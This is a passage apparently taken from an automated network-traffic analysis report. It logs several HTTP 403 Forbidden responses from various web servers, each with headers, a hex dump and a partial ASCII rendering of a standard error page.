54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 73 68 69 66 74 5f 6a 69 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 83 41 83 4e 83 5a 83 58 83 47 83 89 81 5b 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 62 61 73 65 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 69 64 3d 22 42 4d 61 6e 61 67 65 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 42 4d 61 69 6e 43 6f 6e 74 65 6e 74 73 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 46 65 6e 63 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 62 6f 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 5f 34 30 30 2e 67 69 66 22 20 61 6c 74 3d 22 22 20 2f 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77562Content-Type: text/html; charset=UTF-8Date: Fri, 15 Sep 2023 05:27:56 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: yblqs0bB/dkbtOp6NData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:56 GMTServer: ApacheVary: X-Forwarded-For,Host,User-AgentX-Powered-By: PHP/5.3.3Content-Length: 1018Keep-Alive: timeout=2, max=100Connection: Keep-AliveContent-Type: text/html; charset=shift_jisData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 73 68 69 66 74 5f 6a 69 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 83 41 83 4e 83 5a 83 58 83 47 83 89 81 5b 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 62 61 73 65 20 74 61 72 67 65 74 3d 22 5f 73 65 6c 66 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 69 64 3d 22 42 4d 61 6e 61 67 65 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 42 4d 61 69 6e 43 6f 6e 74 65 6e 74 73 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 46 65 6e 63 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 42 53 70 61 63 65 31 30 70 78 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 62 6f 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 5f 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 73 6f 72 72 79 2f 66 72 6f 6e 74 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 5f 34 30 30 2e 67 69 66 22 20 61 6c 74 3d 22 22 20 2f 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0d 0a 20
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Fri, 15 Sep 2023 05:27:57 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Fri, 15 Sep 2023 05:28:12 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s5DguZUajcusFnpXgw8BaE8%2BKggOJ0vegjj0U4l2%2BRDEh9d8lMsU8RKk%2F9fc82Pw0Jx0J11an4znUY6%2B1OIg2F9Z3iPh5vaEB7%2F6AvSojxnvBXfDEDRYYnebmBN%2BKYo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e76a7386343f9-EWRalt-svc: h3=":443"; ma=86400Data Raw: 31 35 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 Data Ascii: 15e3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Co
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:27:59 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: gA80FevHVPkqWbM+n6rDB7HuI3gDK9u/M1Am1WiJrag=,m0j2EEknGIVUW/liY8BLLk1Uxi5aVwrmRyfWZ8T7SgAMbwluI1yUDJty9McxOlfYX-Wix-Request-Id: 1694755679.7017644508879127555X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 15 Sep 2023 05:28:02 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 15 Sep 2023 05:28:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Fri, 15 Sep 2023 05:28:18 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ROHZiG6w7mv64TXB1dmr6Ez0SGwXMyt4RSY1jeDWiGahMjmHEdKkwIvzkVoGQdCTCpYiZ0u8TXUlN96TtzdB%2FvD8ffr%2FSipdt5KdWa%2B7KzX3VbWc3HQzPMUkQWGvYTeo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 806e76cd9ed203d5-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 